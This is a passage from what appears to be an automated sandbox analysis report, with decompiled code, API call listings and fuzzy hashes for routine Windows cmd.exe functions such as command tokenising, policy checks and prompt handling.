                                    					_t82 =  *0x1213ccc;
                                    					if(_t44 != 0) {
                                    						_t44 = 1;
                                    						_v44 = 1;
                                    						__eflags = _t82;
                                    						if(__eflags != 0) {
                                    							_v28 = 0xff;
                                    						}
                                    					} else {
                                    						_t44 = _v44;
                                    					}
                                    					if(_t44 != 0) {
                                    						goto L10;
                                    					} else {
                                    						_t97 = 0;
                                    						goto L7;
                                    					}
                                    				}
                                    			}






























                                    APIs
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E4516
                                    • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 011E4523
                                      • Part of subcall function 011E465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
                                      • Part of subcall function 011E465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                    • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 011E4538
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 011E4555
                                    • _setjmp3.MSVCRT ref: 011E45BD
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 011E45EE
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E45FF
                                    • exit.MSVCRT ref: 011E4625
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 011EE707
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011EE710
                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E4770
                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E478C
                                      • Part of subcall function 011E46D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                      • Part of subcall function 011E46D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                      • Part of subcall function 011E46D8: memset.MSVCRT ref: 011E4703
                                      • Part of subcall function 011E3D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                      • Part of subcall function 011E3D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                      • Part of subcall function 011E3D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                      • Part of subcall function 011E3D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D85
                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D99
                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                    • _setjmp3.MSVCRT ref: 011EE785
                                    Strings
                                    • DisableCMD, xrefs: 011EE6FF
                                    • Software\Policies\Microsoft\Windows\System, xrefs: 011E454B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                    • API String ID: 4268540630-1920437939
                                    • Opcode ID: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                    • Instruction ID: 11d40929f194e6a4fe30daf578201b1c5c5b5d6784bd68168e57703f76d61b55
                                    • Opcode Fuzzy Hash: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                    • Instruction Fuzzy Hash: C171D571E41A0AEEEF3DEBF5BC9CA7E3BE9EB18218B140429E501D2185DF70C4408B65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • _wcsicmp.MSVCRT ref: 011DD005
                                    • _wcsicmp.MSVCRT ref: 011DD01B
                                    • _wcsicmp.MSVCRT ref: 011DD031
                                    • _wcsicmp.MSVCRT ref: 011DD047
                                    • _wcsicmp.MSVCRT ref: 011DD05D
                                    • _wcsicmp.MSVCRT ref: 011DD073
                                    • _wcsicmp.MSVCRT ref: 011DD085
                                    • _wcsicmp.MSVCRT ref: 011DD09B
                                      • Part of subcall function 011D96A0: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                      • Part of subcall function 011D96A0: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                      • Part of subcall function 011D96A0: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                      • Part of subcall function 011D96A0: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                    • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                    • API String ID: 2447294730-2301591722
                                    • Opcode ID: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                    • Instruction ID: 5a0ed5444746943e53c27e84cdc6754e49d4beb7520d823db971327570d2ce85
                                    • Opcode Fuzzy Hash: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                    • Instruction Fuzzy Hash: 1F311832608602ABFF3CA77ABC1DFAB26DDDB95564B14441EF512D11C4EF319002C766
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 96%
                                    			E011DF300(signed int __eax, signed short* __ecx, intOrPtr __edx, signed int _a4) {
                                    				signed short* _v8;
                                    				intOrPtr _v12;
                                    				signed short* _v16;
                                    				long _v20;
                                    				signed int _t92;
                                    				signed int _t102;
                                    				signed int _t109;
                                    				signed char _t110;
                                    				int _t111;
                                    				wchar_t* _t112;
                                    				wchar_t* _t113;
                                    				int _t114;
                                    				signed int _t120;
                                    				long _t121;
                                    				int _t122;
                                    				wchar_t* _t123;
                                    				signed int _t129;
                                    				int _t130;
                                    				signed int _t135;
                                    				int _t136;
                                    				signed int _t139;
                                    				signed short* _t141;
                                    				int _t148;
                                    				long _t152;
                                    				int _t153;
                                    				int _t155;
                                    				wchar_t* _t156;
                                    				wchar_t* _t157;
                                    				int _t164;
                                    				wchar_t* _t165;
                                    				wchar_t* _t166;
                                    				signed short* _t167;
                                    				signed int _t169;
                                    				signed int _t173;
                                    				long* _t174;
                                    				long* _t180;
                                    				long* _t181;
                                    				intOrPtr _t182;
                                    				long* _t183;
                                    				long _t184;
                                    				long _t185;
                                    				long _t186;
                                    				long _t187;
                                    				void* _t188;
                                    				void* _t189;
                                    				void* _t192;
                                    
                                    				_t175 = __ecx;
                                    				_t92 = __eax;
                                    				_push(0);
                                    				_push(0x120b8f8);
                                    				_v12 = __edx;
                                    				_v8 = __ecx;
                                    				L011E82C1();
                                    				_t189 = _t188 + 8;
                                    				if(__eax != 0) {
                                    					L139:
                                    					return _t92 | 0xffffffff;
                                    				}
                                    				_t180 = _v8;
                                    				if(_t180 == 0) {
                                    					if( *0x120f984 != 0) {
                                    						_push( *0x120b8a0);
                                    						E011E25D9(L"Ungetting: \'%s\'\n");
                                    					}
                                    					 *0x120b8a4 =  *0x120b8a0;
                                    					return 0;
                                    				} else {
                                    					if(_v12 < 6) {
                                    						goto L139;
                                    					}
                                    					_t169 = _a4;
                                    					 *0x120b8a0 =  *0x120b8a4;
                                    					_v16 = _t180;
                                    					if((_t169 & 0x00000021) == 0) {
                                    						while(1) {
                                    							_t187 = E011DF9D5(_t175) & 0x0000ffff;
                                    							_t164 = iswspace(_t187);
                                    							_t189 = _t189 + 4;
                                    							if(_t164 != 0 && _t187 != 0xa) {
                                    								goto L6;
                                    							} else {
                                    								continue;
                                    							}
                                    							do {
                                    								_t187 = E011DF9D5(_t175) & 0x0000ffff;
                                    								_t164 = iswspace(_t187);
                                    								_t189 = _t189 + 4;
                                    							} while (_t164 != 0 && _t187 != 0xa);
                                    							L6:
                                    							if((_t169 & 0x00000004) != 0) {
                                    								_t165 = 0x11d2102;
                                    							} else {
                                    								_t165 = L"=,;";
                                    							}
                                    							_t166 = wcschr(_t165, _t187);
                                    							_t189 = _t189 + 8;
                                    							if(_t166 != 0) {
                                    								if(_t187 == 0) {
                                    									goto L9;
                                    								} else {
                                    									continue;
                                    								}
                                    							}
                                    							L9:
                                    							_t167 =  *0x120b8a4;
                                    							if(_t167 != 0x1203890) {
                                    								 *0x120b8a4 = _t167 - 2;
                                    							}
                                    							goto L11;
                                    						}
                                    					}
                                    					L11:
                                    					_t184 = E011DF9D5(_t175) & 0x0000ffff;
                                    					if( *0x11fd5b4 != 0) {
                                    						 *0x11fd5b4 = 0;
                                    						if((_t169 & 0x00000040) != 0) {
                                    							goto L41;
                                    						} else {
                                    							_t184 = E011DF9D5(_t175) & 0x0000ffff;
                                    							goto L12;
                                    						}
                                    						goto L140;
                                    					} else {
                                    						L12:
                                    						_t129 = _t184 & 0x0000ffff;
                                    						if(_t129 != 0xa) {
                                    							if(_t129 >= 0x41) {
                                    								if(_t129 >= 0x7c) {
                                    									goto L25;
                                    								} else {
                                    									goto L33;
                                    								}
                                    							} else {
                                    								L25:
                                    								if(_t129 > 0x7c) {
                                    									goto L33;
                                    								} else {
                                    									_t16 = _t129 + 0x11df8c0; // 0x5050500
                                    									switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M011DF8A8))) {
                                    										case 0:
                                    											goto L13;
                                    										case 1:
                                    											goto L14;
                                    										case 2:
                                    											L27:
                                    											if((_t169 & 0x0000002a) == 8) {
                                    												goto L28;
                                    											}
                                    											goto L33;
                                    										case 3:
                                    											L28:
                                    											if((_t169 & 0x00000022) == 0) {
                                    												if((_t169 & 0x00000010) != 0 || _t184 != 0x29) {
                                    													goto L13;
                                    												} else {
                                    												}
                                    											}
                                    											goto L33;
                                    										case 4:
                                    											if((__bl & 0x00000022) != 0) {
                                    												goto L33;
                                    											} else {
                                    												if( *0x11fd548 != 0) {
                                    													goto L27;
                                    												} else {
                                    													goto L41;
                                    												}
                                    											}
                                    											goto L140;
                                    										case 5:
                                    											goto L33;
                                    									}
                                    								}
                                    							}
                                    						} else {
                                    							L13:
                                    							_t169 = _t169 & 0xffffffdd;
                                    							_a4 = _t169;
                                    							L14:
                                    							if((_t169 & 0x00000022) == 0) {
                                    								L15:
                                    								 *_t180 = _t184;
                                    								_t183 =  &(_t180[0]);
                                    								_v8 = _t183;
                                    								_t174 = _t183;
                                    								_t136 = iswdigit(_t184);
                                    								_t192 = _t189 + 4;
                                    								if(_t136 != 0) {
                                    									_t184 = E011DF9D5(_t175) & 0x0000ffff;
                                    									_t174 =  &(_t183[0]);
                                    									 *_t183 = _t184;
                                    									_t183 = _t174;
                                    									_v8 = _t183;
                                    								}
                                    								if(_t184 == 0x3e || _t184 == 0x26 || _t184 == 0x7c || _t184 == 0x3c) {
                                    									_t139 = E011DF9D5(_t175) & 0x0000ffff;
                                    									if(_t139 ==  *(_t183 - 2)) {
                                    										 *_t183 = _t139;
                                    										_t183 =  &(_t174[0]);
                                    										_v8 = _t183;
                                    										_t139 = E011DF9D5(_t175) & 0x0000ffff;
                                    										_t174 = _t183;
                                    									}
                                    									_t176 =  *(_t183 - 2) & 0x0000ffff;
                                    									if(_t176 != 0x3e) {
                                    										if(_t176 != 0x3c) {
                                    											goto L79;
                                    										}
                                    										goto L78;
                                    									} else {
                                    										L78:
                                    										if(_t139 == 0x26) {
                                    											 *_t183 = 0x26;
                                    											_t183 =  &(_t174[0]);
                                    											_v8 = _t183;
                                    											goto L109;
                                    											do {
                                    												do {
                                    													L109:
                                    													_t186 = E011DF9D5(_t176) & 0x0000ffff;
                                    													_t148 = iswspace(_t186);
                                    													_t192 = _t192 + 4;
                                    												} while (_t148 != 0);
                                    												_t176 = L"=,;";
                                    											} while (E011DD7D4(L"=,;", _t186) != 0);
                                    											if(iswdigit(_t186) != 0) {
                                    												 *_t183 = _t186;
                                    												_t183 =  &(_t183[0]);
                                    												_v8 = _t183;
                                    												E011DF9D5(_t176);
                                    											}
                                    										}
                                    										L79:
                                    										_t141 =  *0x120b8a4;
                                    										if(_t141 != 0x1203890) {
                                    											 *0x120b8a4 = _t141 - 2;
                                    										}
                                    										goto L20;
                                    									}
                                    								} else {
                                    									L20:
                                    									 *_t183 = 0;
                                    									return  *_v16 & 0x0000ffff;
                                    								}
                                    							}
                                    							L33:
                                    							if(_t184 == 0x5e) {
                                    								if((_t169 & 0x00000022) != 0) {
                                    									goto L34;
                                    								} else {
                                    									_t184 = E011DF9D5(_t175) & 0x0000ffff;
                                    									if(_t184 == 0) {
                                    										goto L15;
                                    									}
                                    									if(_t184 != 0xa) {
                                    										goto L41;
                                    									} else {
                                    										_t184 = E011DF9D5(_t175) & 0x0000ffff;
                                    										if(_t184 != 0) {
                                    											goto L41;
                                    										} else {
                                    											goto L15;
                                    										}
                                    									}
                                    								}
                                    								goto L140;
                                    							} else {
                                    								L34:
                                    								if(_t184 == 0x22) {
                                    									_t169 = _t169 ^ 0x00000002;
                                    									_a4 = _t169;
                                    								}
                                    								if((_t169 & 0x00000023) == 0) {
                                    									_t155 = iswspace(_t184);
                                    									_t189 = _t189 + 4;
                                    									if(_t155 != 0) {
                                    										goto L15;
                                    									}
                                    									if((_t169 & 0x00000004) != 0) {
                                    										_t156 = 0x11d2102;
                                    									} else {
                                    										_t156 = L"=,;";
                                    									}
                                    									_t157 = wcschr(_t156, _t184);
                                    									_t189 = _t189 + 8;
                                    									if(_t157 != 0) {
                                    										goto L15;
                                    									}
                                    								}
                                    								_t130 = iswdigit(_t184);
                                    								_t189 = _t189 + 4;
                                    								if(_t130 != 0) {
                                    									_t175 =  *0x120b8a4;
                                    									if((_t175 - 0x120388e & 0xfffffffe) < 4) {
                                    										L88:
                                    										_t135 =  *_t175 & 0x0000ffff;
                                    										if(_t135 != 0x3e) {
                                    											if(_t135 != 0x3c) {
                                    												goto L41;
                                    											} else {
                                    												goto L89;
                                    											}
                                    										} else {
                                    											L89:
                                    											if((_t169 & 0x00000022) == 0) {
                                    												goto L15;
                                    											}
                                    											goto L41;
                                    										}
                                    									} else {
                                    										_t152 =  *(_t175 - 4) & 0x0000ffff;
                                    										_v20 = _t152;
                                    										_t153 = iswspace(_t152);
                                    										_t189 = _t189 + 4;
                                    										if(_t153 == 0) {
                                    											_t175 = L"()|&=,;\"";
                                    											if(E011DD7D4(L"()|&=,;\"", _v20) == 0) {
                                    												goto L41;
                                    											} else {
                                    												goto L87;
                                    											}
                                    										} else {
                                    											L87:
                                    											_t175 =  *0x120b8a4;
                                    											goto L88;
                                    										}
                                    									}
                                    									goto L140;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					L41:
                                    					 *_t180 = _t184;
                                    					_t181 =  &(_t180[0]);
                                    					_a4 = _t169 | 0x00000040;
                                    					 *0x11fd548 = 0;
                                    					_t173 = _t181 - _v16 >> 1;
                                    					while(1) {
                                    						_v8 = _t181;
                                    						_t185 = E011DF9D5(_t175) & 0x0000ffff;
                                    						if( *0x11fd5b4 != 0) {
                                    							goto L131;
                                    						}
                                    						L43:
                                    						_t109 = _t185 & 0x0000ffff;
                                    						if(_t109 < 0x41 || _t109 >= 0x7c) {
                                    							if(_t109 > 0x7c) {
                                    								goto L45;
                                    							} else {
                                    								_t34 = _t109 + 0x11df958; // 0x5050500
                                    								switch( *((intOrPtr*)(( *_t34 & 0x000000ff) * 4 +  &M011DF940))) {
                                    									case 0:
                                    										_t127 = _a4;
                                    										goto L54;
                                    									case 1:
                                    										__eax = _a4;
                                    										goto L55;
                                    									case 2:
                                    										__eax = _a4;
                                    										goto L114;
                                    									case 3:
                                    										L101:
                                    										__eax = _a4;
                                    										if((__al & 0x00000022) != 0) {
                                    											goto L45;
                                    										} else {
                                    											if((__al & 0x00000010) != 0) {
                                    												L54:
                                    												_t102 = _t127 & 0xffffffdd;
                                    												_a4 = _t102;
                                    												L55:
                                    												if((_t102 & 0x00000022) != 0) {
                                    													goto L45;
                                    												}
                                    												goto L62;
                                    											} else {
                                    												if(__si == 0x29) {
                                    													goto L45;
                                    												} else {
                                    													goto L54;
                                    												}
                                    											}
                                    										}
                                    										goto L140;
                                    									case 4:
                                    										__eax = _a4;
                                    										if((__al & 0x00000022) != 0) {
                                    											goto L45;
                                    										} else {
                                    											if( *0x11fd548 == 0) {
                                    												goto L49;
                                    											} else {
                                    												L114:
                                    												__al = __al & 0x0000002a;
                                    												if(__al != 8) {
                                    													goto L45;
                                    												} else {
                                    													goto L101;
                                    												}
                                    											}
                                    										}
                                    										goto L140;
                                    									case 5:
                                    										goto L45;
                                    								}
                                    							}
                                    						} else {
                                    							L45:
                                    							_t110 = _a4;
                                    							if(_t185 == 0x5e) {
                                    								if((_t110 & 0x00000022) != 0) {
                                    									goto L46;
                                    								} else {
                                    									_t185 = E011DF9D5(_t175) & 0x0000ffff;
                                    									if(_t185 == 0) {
                                    										goto L61;
                                    									} else {
                                    										if(_t185 != 0xa) {
                                    											goto L49;
                                    										} else {
                                    											_t185 = E011DF9D5(_t175) & 0x0000ffff;
                                    											if(_t185 == 0) {
                                    												goto L61;
                                    											} else {
                                    												goto L49;
                                    											}
                                    										}
                                    									}
                                    								}
                                    								goto L140;
                                    							} else {
                                    								L46:
                                    								if(_t185 == 0x22) {
                                    									_t110 = _t110 ^ 0x00000002;
                                    									_a4 = _t110;
                                    								}
                                    								if((_t110 & 0x00000023) == 0) {
                                    									_t111 = iswspace(_t185);
                                    									_t189 = _t189 + 4;
                                    									if(_t111 != 0) {
                                    										goto L61;
                                    									} else {
                                    										if((_a4 & 0x00000004) != 0) {
                                    											_t112 = 0x11d2102;
                                    										} else {
                                    											_t112 = L"=,;";
                                    										}
                                    										_t113 = wcschr(_t112, _t185);
                                    										_t189 = _t189 + 8;
                                    										if(_t113 == 0) {
                                    											goto L48;
                                    										} else {
                                    											goto L61;
                                    										}
                                    									}
                                    								} else {
                                    									L48:
                                    									_t114 = iswdigit(_t185);
                                    									_t189 = _t189 + 4;
                                    									if(_t114 != 0) {
                                    										_t175 =  *0x120b8a4;
                                    										if((_t175 - 0x120388e & 0xfffffffe) < 4) {
                                    											L70:
                                    											_t120 =  *( *0x120b8a4) & 0x0000ffff;
                                    											if(_t120 == 0x3e || _t120 == 0x3c) {
                                    												_t102 = _a4;
                                    												if((_t102 & 0x00000022) == 0) {
                                    													goto L62;
                                    												} else {
                                    													goto L49;
                                    												}
                                    											} else {
                                    												goto L49;
                                    											}
                                    										} else {
                                    											_t121 =  *(_t175 - 4) & 0x0000ffff;
                                    											_v20 = _t121;
                                    											_t122 = iswspace(_t121);
                                    											_t189 = _t189 + 4;
                                    											if(_t122 != 0) {
                                    												goto L70;
                                    											} else {
                                    												_t123 = wcschr(L"()|&=,;\"", _v20);
                                    												_t189 = _t189 + 8;
                                    												if(_t123 == 0) {
                                    													goto L49;
                                    												} else {
                                    													goto L70;
                                    												}
                                    											}
                                    										}
                                    										goto L140;
                                    									} else {
                                    										L49:
                                    										if(_t173 >= _v12 - 1) {
                                    											L61:
                                    											_t102 = _a4;
                                    										} else {
                                    											 *_t181 = _t185;
                                    											_t181 =  &(_t181[0]);
                                    											_t173 = _t173 + 1;
                                    											continue;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    						L62:
                                    						_a4 = _t102 & 0xffffffbf;
                                    						 *_t181 = 0;
                                    						_t182 = _v12;
                                    						_t47 = _t182 - 1; // 0x3
                                    						if(_t173 < _t47) {
                                    							_t175 =  *0x120b8a4;
                                    							if( *0x120b8a4 != 0x1203890) {
                                    								 *0x120b8a4 =  *0x120b8a4 - 2;
                                    							}
                                    						}
                                    						if(_t173 >= _t182) {
                                    							if(_t185 != 0xffff) {
                                    								_t92 = E011DC5A2(_t175, 0x234f, 1, _v16);
                                    								goto L139;
                                    							}
                                    						}
                                    						return 0x4000;
                                    						goto L140;
                                    						L131:
                                    						 *0x11fd5b4 = 0;
                                    						if((_a4 & 0x00000040) != 0) {
                                    							goto L49;
                                    						} else {
                                    							_t185 = E011DF9D5(_t175) & 0x0000ffff;
                                    							goto L43;
                                    						}
                                    						goto L140;
                                    					}
                                    				}
                                    				goto L140;
                                    			}
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswspace$wcschr$iswdigit$_setjmp3
                                    • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                    • API String ID: 1805751789-2755026540
                                    • Opcode ID: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                    • Instruction ID: 3b2e26927944b91f88d64370b0b0d0722f7b0f0ba93f8f8ff0ccbb8749d1bbe7
                                    • Opcode Fuzzy Hash: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                    • Instruction Fuzzy Hash: F4E10675A00213AADF3D8F6DA94C3BA3BA0AF05258F594126ED47D7292E734C783C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			E011F9583(void* __ecx, intOrPtr __edx, char _a4) {
                                    				signed int _v12;
                                    				long _v44;
                                    				char _v45;
                                    				char _v46;
                                    				long _v52;
                                    				long _v56;
                                    				long _v60;
                                    				long _v64;
                                    				intOrPtr _v68;
                                    				void* _v72;
                                    				char _v76;
                                    				intOrPtr _v80;
                                    				void* _v84;
                                    				void* _v88;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t51;
                                    				intOrPtr _t58;
                                    				void* _t69;
                                    				signed int _t74;
                                    				void* _t81;
                                    				signed int _t93;
                                    				void _t94;
                                    				signed int _t98;
                                    				char _t100;
                                    				void* _t101;
                                    				signed int* _t105;
                                    				intOrPtr* _t106;
                                    				void* _t114;
                                    				void* _t120;
                                    				void* _t122;
                                    				void* _t124;
                                    				void* _t125;
                                    				intOrPtr _t126;
                                    				void* _t127;
                                    				long _t128;
                                    				void* _t130;
                                    				wchar_t* _t131;
                                    				long _t134;
                                    				signed int _t135;
                                    				void* _t136;
                                    				void* _t137;
                                    				void* _t138;
                                    
                                    				_t104 = __ecx;
                                    				_t51 =  *0x11fd0b4; // 0x2833377e
                                    				_v12 = _t51 ^ _t135;
                                    				_t100 = _a4;
                                    				_t128 = 0;
                                    				_v68 = __edx;
                                    				_v72 = __ecx;
                                    				_v56 = 0;
                                    				_v45 = 0;
                                    				_v46 = 0;
                                    				if(__edx != 0x400023d3) {
                                    					L5:
                                    					_push(_t100);
                                    					_t124 = E011DB3FC(_t104);
                                    					_t137 = _t136 + 4;
                                    					if(_t124 == 0) {
                                    						L10:
                                    						_t105 =  &_v44;
                                    						_t120 = 0x10;
                                    						_t130 = L"NY" - _t105;
                                    						while(1) {
                                    							_t12 = _t120 + 0x7fffffee; // 0x7ffffffe
                                    							if(_t12 == 0) {
                                    								break;
                                    							}
                                    							_t93 =  *(_t130 + _t105) & 0x0000ffff;
                                    							if(_t93 == 0) {
                                    								break;
                                    							}
                                    							 *_t105 = _t93;
                                    							_t105 =  &(_t105[0]);
                                    							_t120 = _t120 - 1;
                                    							if(_t120 != 0) {
                                    								continue;
                                    							}
                                    							L16:
                                    							_t105 = _t105 - 2;
                                    							L17:
                                    							_t128 = 0;
                                    							 *_t105 = 0;
                                    							L18:
                                    							_t106 =  &_v44;
                                    							_t121 = _t106 + 2;
                                    							do {
                                    								_t58 =  *_t106;
                                    								_t106 = _t106 + 2;
                                    							} while (_t58 != 0);
                                    							_t108 = _t106 - _t121 >> 1;
                                    							_v80 = (_t106 - _t121 >> 1) - 1;
                                    							LocalFree(_t124);
                                    							_t101 = GetStdHandle(0xfffffff5);
                                    							_v88 = _t101;
                                    							if(GetConsoleMode(_t101,  &_v60) != 0) {
                                    								_t108 = _v60 | 0x00000001;
                                    								_v45 = 1;
                                    								SetConsoleMode(_t101, _v60 | 0x00000001);
                                    							}
                                    							_t125 = GetStdHandle(0xfffffff6);
                                    							_v84 = _t125;
                                    							if(GetConsoleMode(_t125,  &_v64) != 0) {
                                    								_t108 = _v64 | 0x00000007;
                                    								SetConsoleMode(_t125, _v64 | 0x00000007);
                                    								_t134 =  *0x1203888;
                                    								if(_t134 != 0) {
                                    									_t108 = _t134;
                                    									 *0x12194b4(L"<noalias>");
                                    									 *_t134();
                                    								}
                                    								_t128 = 0;
                                    							}
                                    							_t126 = _v68;
                                    							while(1) {
                                    								_t100 = 1;
                                    								_v52 = 0;
                                    								_t68 = _v72;
                                    								if(_v72 == 0) {
                                    									_push(0);
                                    									_push(_t126);
                                    									_t69 = E011DC108(_t108);
                                    									_t138 = _t137 + 8;
                                    								} else {
                                    									_t69 = E011DC108(_t108, _t126, 1, _t68);
                                    									_t138 = _t137 + 0xc;
                                    								}
                                    								_t108 = 0;
                                    								if(E011E0178(_t69) != 0) {
                                    									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
                                    								}
                                    								if(_v52 == 0xa) {
                                    									goto L45;
                                    								} else {
                                    									goto L35;
                                    								}
                                    								while(1) {
                                    									L35:
                                    									_t81 = GetStdHandle(0xfffffff6);
                                    									_t121 =  &_v52;
                                    									_t108 = _t81;
                                    									if(E011F3B11(_t81,  &_v52, 1,  &_v76) == 0 || _v76 != 1) {
                                    										break;
                                    									}
                                    									if(_t100 != 0) {
                                    										_t128 = towupper(_v52) & 0x0000ffff;
                                    										_t138 = _t138 + 4;
                                    										_v56 = _t128;
                                    									}
                                    									_t108 = 0;
                                    									_t100 = 0;
                                    									if(E011E0178(_t82) == 0 || ( *0x1213aa0 & 0x00000001) == 0) {
                                    										_push(_v52 & 0x0000ffff);
                                    										E011E25D9(L"%c");
                                    										_t138 = _t138 + 8;
                                    									}
                                    									if(_v52 != 0xa) {
                                    										continue;
                                    									} else {
                                    										goto L45;
                                    									}
                                    								}
                                    								_t128 = _v44 & 0x0000ffff;
                                    								_v56 = _t128;
                                    								E011E25D9(L"\r\n");
                                    								_t138 = _t138 + 4;
                                    								L45:
                                    								_t131 = wcschr( &_v44, _t128);
                                    								_t137 = _t138 + 8;
                                    								if(_t131 == 0) {
                                    									L28:
                                    									_t128 = _v56;
                                    									continue;
                                    								}
                                    								_t133 = _t131 -  &_v44 >> 1;
                                    								if(_t133 > _v80) {
                                    									goto L28;
                                    								}
                                    								_t127 = _v84;
                                    								if(_v45 != 0) {
                                    									SetConsoleMode(_v88, _v60);
                                    								}
                                    								if(_t100 != 0) {
                                    									SetConsoleMode(_t127, _v64);
                                    									_t127 =  *0x1203888;
                                    									if(_t127 != 0) {
                                    										 *0x12194b4(L"CMD.EXE");
                                    										 *_t127();
                                    									}
                                    								}
                                    								_t74 = _t133;
                                    								L53:
                                    								return E011E6FD0(_t74, _t100, _v12 ^ _t135, _t121, _t127, _t133);
                                    							}
                                    						}
                                    						if(_t120 != 0) {
                                    							goto L17;
                                    						}
                                    						goto L16;
                                    					}
                                    					_t114 = _t124;
